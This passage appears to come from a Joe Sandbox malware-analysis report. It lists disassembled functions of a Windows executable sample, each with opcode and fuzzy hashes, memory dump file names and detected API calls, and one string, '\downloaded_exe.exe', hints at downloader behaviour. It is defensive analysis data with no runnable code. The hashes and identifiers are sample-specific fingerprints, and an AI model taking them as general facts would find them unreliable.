                                                        • API String ID: 4088430540-0
                                                        • Opcode ID: fbb3c620aa439dee0e13824858785b75d82a326a5da076ccd2b04c61642e0d45
                                                        • Instruction ID: bab249c1870da8c099e4d126d89334ff0b28fbf4a4925fcee3f43fc9dd41f071
                                                        • Opcode Fuzzy Hash: fbb3c620aa439dee0e13824858785b75d82a326a5da076ccd2b04c61642e0d45
                                                        • Instruction Fuzzy Hash: 29B26D37B08B6585EB609F65D8442BE7BB0FB44B88F948526DE4D13B98DF78E881C314
                                                        Function 00007FF7020541A0 Relevance: 2.3, APIs: 1, Instructions: 1086stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen
                                                        • String ID:
                                                        • API String ID: 39653677-0
                                                        • Opcode ID: 57f6b4decb6c2ad95cdd243245fc79f14086aa6a6d069996e2280a3f3b5178b1
                                                        • Instruction ID: 5a25e003b34a77d525cd029298373e5867b1292346de571731c0ccb00a61d48a
                                                        • Opcode Fuzzy Hash: 57f6b4decb6c2ad95cdd243245fc79f14086aa6a6d069996e2280a3f3b5178b1
                                                        • Instruction Fuzzy Hash: 79B2AF33A08BA185EB209F65D8443AE7BB4FB45BA4F914636CE5D13B98DF78D881C314
                                                        Function 00007FF70206AE80 Relevance: 2.2, APIs: 1, Instructions: 1000COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a8b10c3fa60d39f480f50766d5eaa362185fc79131af893863ff7058b68919f
                                                        • Instruction ID: 29cc1411cf074c1d460dfc9453d0f246459f063e4f13cee9de105d7164aed370
                                                        • Opcode Fuzzy Hash: 9a8b10c3fa60d39f480f50766d5eaa362185fc79131af893863ff7058b68919f
                                                        • Instruction Fuzzy Hash: 10A2B26370C79585E7209A29984832AFFA0FB41BA8F544231DB9D93BD4CFBDD454CB28
                                                        Function 00007FF70206C1D0 Relevance: 2.2, APIs: 1, Instructions: 982COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7ded6f86c32183ba33c73cb1b97d4b724fc4707c1ecda5d2d93a66cd7eedf491
                                                        • Instruction ID: 1f55aebd9024b8d663fe43eb71a6ce8885a50d3800513da057f57431fea8d7c3
                                                        • Opcode Fuzzy Hash: 7ded6f86c32183ba33c73cb1b97d4b724fc4707c1ecda5d2d93a66cd7eedf491
                                                        • Instruction Fuzzy Hash: 87A2922370C7D185E7209A29984832EBFA1FB85BA4F544236DAD943BD4CFBDD454CB28
                                                        Function 00007FF70206D4F0 Relevance: 2.2, APIs: 1, Instructions: 976COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4c91c98508f138e3a4cb74e19f1a553aaf254e6fcf929a050906e65ed3572a8
                                                        • Instruction ID: 16cd47ec6950e4ecea04c39e8e87dda47918523f7368c13e02ba21450a6ab87a
                                                        • Opcode Fuzzy Hash: f4c91c98508f138e3a4cb74e19f1a553aaf254e6fcf929a050906e65ed3572a8
                                                        • Instruction Fuzzy Hash: 78A2A02770C79185E7209A29E84836ABFA1FB81BA4F544235DB9D43BD4CFBCD454CB28
                                                        Function 00007FF70206E800 Relevance: 2.2, APIs: 1, Instructions: 975COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a530529ad69a8db0e92b9d8ce21609c309f4b953322d191b7450acac31f5b09f
                                                        • Instruction ID: e21f4ff275b56a12d37130e40502d0b923017d8cf8d7caa5ee3b07f8dfc4e42e
                                                        • Opcode Fuzzy Hash: a530529ad69a8db0e92b9d8ce21609c309f4b953322d191b7450acac31f5b09f
                                                        • Instruction Fuzzy Hash: 1CA2922770C79285E7709A29E44836AAFA0FB41BA4F544235DB9E43BD4CFBCD454CB28
                                                        Function 00007FF70206FB20 Relevance: 2.2, APIs: 1, Instructions: 961COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c29e2907aa1d55e865a20c1a2bc047b801e4fda4c0b96b7118827c55d12bce40
                                                        • Instruction ID: fe8d642563ac72ab3aa719a4644df0d0621ebed98dd8c93c2d94d0984efbf3b0
                                                        • Opcode Fuzzy Hash: c29e2907aa1d55e865a20c1a2bc047b801e4fda4c0b96b7118827c55d12bce40
                                                        • Instruction Fuzzy Hash: AFA2A123A0CBD185E760AA29A84437AEFA2FB81BA4F544331DA9D03BD5DFBCD454C714
                                                        Function 00007FF7020529F0 Relevance: 2.2, Strings: 1, Instructions: 948COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen
                                                        • String ID: c
                                                        • API String ID: 39653677-112844655
                                                        • Opcode ID: 27bb517b160f5f25807cec2ad74516e140f448f0527a3c8620e1eb9c043d73ce
                                                        • Instruction ID: 6d07c49557833497ea8bf7f788a3529c6c814a81795279b01aff404a0c146d2b
                                                        • Opcode Fuzzy Hash: 27bb517b160f5f25807cec2ad74516e140f448f0527a3c8620e1eb9c043d73ce
                                                        • Instruction Fuzzy Hash: F6929E33608B9586E7609F25E84066BFBA1FB85B90F544236EE8D43BA4DFBCD450CB14
                                                        Function 00007FF702059DA0 Relevance: 2.0, Strings: 1, Instructions: 787COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: wcslen
                                                        • String ID: c
                                                        • API String ID: 4088430540-112844655
                                                        • Opcode ID: 3c687703636dd7dfd6f57f508cd4a2804e3057a7917b095143ab0eed7b72fd6d
                                                        • Instruction ID: 7e2e084f649d1fd093204a3e98f26510629faa25e178c3e3472d98e45b217c6c
                                                        • Opcode Fuzzy Hash: 3c687703636dd7dfd6f57f508cd4a2804e3057a7917b095143ab0eed7b72fd6d
                                                        • Instruction Fuzzy Hash: 52728137608B9585EB609F25E88066FBBA0FB95B80F944132EE8D43BA8DF7CD441C754
                                                        Function 00007FF702040220 Relevance: 1.9, APIs: 1, Instructions: 440COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: afa40f5263f2b7e03696a1664dad1365bf4749f9d123cf0b45276900f169fb26
                                                        • Instruction ID: 81e169be3b58d82e2c96c676372305343597f1245615b5b84506c31815f01d6a
                                                        • Opcode Fuzzy Hash: afa40f5263f2b7e03696a1664dad1365bf4749f9d123cf0b45276900f169fb26
                                                        • Instruction Fuzzy Hash: BD02C4A3A1D7C281EA64AB15A90437AEEA2FF85780F848035DF8D17B95DFBCD044C724
                                                        Function 00007FF7020808B0 Relevance: 1.9, Strings: 1, Instructions: 684COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: A
                                                        • API String ID: 0-3554254475
                                                        • Opcode ID: f6c0a36e6cd7dc1a97e3ebc324599cc5d3434270ee7931d2752284ea00542ed8
                                                        • Instruction ID: fa12cfadd0877ed9f7fed27c2d7cb9bfd859cad156df2c42c3d91522fe76a2b9
                                                        • Opcode Fuzzy Hash: f6c0a36e6cd7dc1a97e3ebc324599cc5d3434270ee7931d2752284ea00542ed8
                                                        • Instruction Fuzzy Hash: 50624923A0CBC185EB609B25A8447ABBBA1FB85B94F944125EFCD03B99DF7CD444CB14
                                                        Function 00007FF702072C40 Relevance: 1.9, APIs: 1, Instructions: 645COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5159bd791bc1e25551878a32874de2d328ef344edf4c42513b9cf84b8fb6f37c
                                                        • Instruction ID: cb2cc6def53c720bfb11c824ba21850c313f7d497c4106f04edd99bc8f705fdc
                                                        • Opcode Fuzzy Hash: 5159bd791bc1e25551878a32874de2d328ef344edf4c42513b9cf84b8fb6f37c
                                                        • Instruction Fuzzy Hash: 9352B333A0C7818AE765EB24984023EBFA1FB85794F544175EF9903B99CB7CE850DB24
                                                        Function 00007FF7020737F0 Relevance: 1.9, APIs: 1, Instructions: 638COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e22b1e9165f83443a0d57fec952e6d84f4ffa9befac1977af2ac23bdf547dc43
                                                        • Instruction ID: 840739648e8844dff582d616159b00acd02ed97dcd62d35d740ac47ccbb88e23
                                                        • Opcode Fuzzy Hash: e22b1e9165f83443a0d57fec952e6d84f4ffa9befac1977af2ac23bdf547dc43
                                                        • Instruction Fuzzy Hash: AF52962390C78186E721EB65A84023AFFA0FB957A4F544275EB9D03BD5CBBCD850DB24
                                                        Function 00007FF7020720F0 Relevance: 1.9, APIs: 1, Instructions: 636COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 202ba07bf6420ec37ecda694ecd409c02179ebaebda926f058b80199682493eb
                                                        • Instruction ID: 62cdb8f3be6d440da63c0adbb69b5a5192cd89d35c73b8dd1673f782851cf05f
                                                        • Opcode Fuzzy Hash: 202ba07bf6420ec37ecda694ecd409c02179ebaebda926f058b80199682493eb
                                                        • Instruction Fuzzy Hash: 5552852390C7818AE761EA65984023EFFA0FB957A4F544235EE9D03BD5CBBCD950CB24
                                                        Function 00007FF702074EB0 Relevance: 1.9, APIs: 1, Instructions: 633COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d1dee190c9f75e70678965cc2ca8a727f3b24b78fd1acd02ae9e27d9b33bfd77
                                                        • Instruction ID: 5a4c833baad42e92366f3617adf4341fb1326e008430b7fc4c601b73087eceeb
                                                        • Opcode Fuzzy Hash: d1dee190c9f75e70678965cc2ca8a727f3b24b78fd1acd02ae9e27d9b33bfd77
                                                        • Instruction Fuzzy Hash: 2552912390C78186E761EA25A8403BABFA1FB85B94FC44135EE9D037D5DBBCE850C764
                                                        Function 00007FF702074340 Relevance: 1.9, APIs: 1, Instructions: 630COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 981934cae33f90d23c9ea7aa20d98fe763f7a898be769c65b9e7e16931ce2627
                                                        • Instruction ID: 1ac30e3e1439ce6c48a4fb87225d9999936204601a4fb0ccf496e66e0a37aa6e
                                                        • Opcode Fuzzy Hash: 981934cae33f90d23c9ea7aa20d98fe763f7a898be769c65b9e7e16931ce2627
                                                        • Instruction Fuzzy Hash: 1C529323A0C79186E761EA25A84033EBFB0FB95754F844135EAD903BD5CBBCE854DB24
                                                        Function 00007FF7020D1F40 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID: \downloaded_exe.exe
                                                        • API String ID: 2221118986-1839852069
                                                        • Opcode ID: 093aac12ced6ec54b4291ec7a8481ff48d520b5fb866230c05cbe482f1d6b0ee
                                                        • Instruction ID: c5f8ca3f6d2026e7cf0229076ec35f6496f50c2d8aff26db2ffd3ad5090c81f5
                                                        • Opcode Fuzzy Hash: 093aac12ced6ec54b4291ec7a8481ff48d520b5fb866230c05cbe482f1d6b0ee
                                                        • Instruction Fuzzy Hash: 5982C166D09B4BA1FB00BB15AC553B6BB60BF5478CFC05236D88C06665DFFDA085C3A8
                                                        Function 00007FF7020474F0 Relevance: 1.8, Strings: 1, Instructions: 506COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: y
                                                        • API String ID: 0-4225443349
                                                        • Opcode ID: cf89ddac694b930a86384e0b03efc84eb2c1ef1d255ea8d38d47d7927b3d8efd
                                                        • Instruction ID: 873cc2ce1b412faea2c9635c2c9c704dc9b20544ee7356af85c3f8a4627bf217
                                                        • Opcode Fuzzy Hash: cf89ddac694b930a86384e0b03efc84eb2c1ef1d255ea8d38d47d7927b3d8efd
                                                        • Instruction Fuzzy Hash: 0B02D337609B8486D6609F5AF88039ABBA5F798B90F50412AEFCC53B28DF7CD455CB04
                                                        Function 00007FF702030440 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
